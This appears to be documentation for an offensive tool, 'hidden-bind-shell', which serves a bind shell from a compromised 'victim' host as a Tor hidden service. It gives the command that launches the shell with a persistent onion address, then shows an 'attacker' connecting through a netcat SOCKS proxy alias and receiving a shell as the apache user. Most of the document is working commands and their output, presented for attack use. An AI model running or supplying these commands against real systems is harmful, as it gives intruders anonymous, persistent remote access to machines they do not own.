Multi-shell access with hidden-bind-shell

In order to get a bind shell served by Victim1 on the Tor network, we will use hidden-bind-shell as follows. As shown in the following illustration, the victim publish a Hidden Server so that any connection will serve a shell.

When the bind shell is publish, any access will be replied with a shell. Use with CAUTION!

1. Hidden Service for bind shell

In order to get a bind shell served by Victim1, we will use hidden-bind-shell. We need to specify the hidden service port with -hiddensrvport parameter and the datadir with -data-dir parameter.

[victim1]$ ./hidden-bind-shell -data-dir /tmp/datadir/ -hiddensrvport 1234
Bind shell is listening on hgnzi6j3rqog6yew.onion:1234

Using -data-dir parameter is specially important here. It will contain the keys for the Hidden Service so that the onion address doesn't change. If not specified, each execution will create a different Hidden Service.

2. Connect to the bind shell

Now that the Hidden Service is listening, the attacker will attempt to gain a shell:

Note that the Tor instance proxy must be running so that the traffix is rooted to Tor network.

[attacker]$ alias nctor='nc --proxy --proxy-type socks5'
[attacker]$ nctor -v hgnzi6j3rqog6yew.onion 1234
uid=48(apache) gid=48(apache) groups=48(apache)

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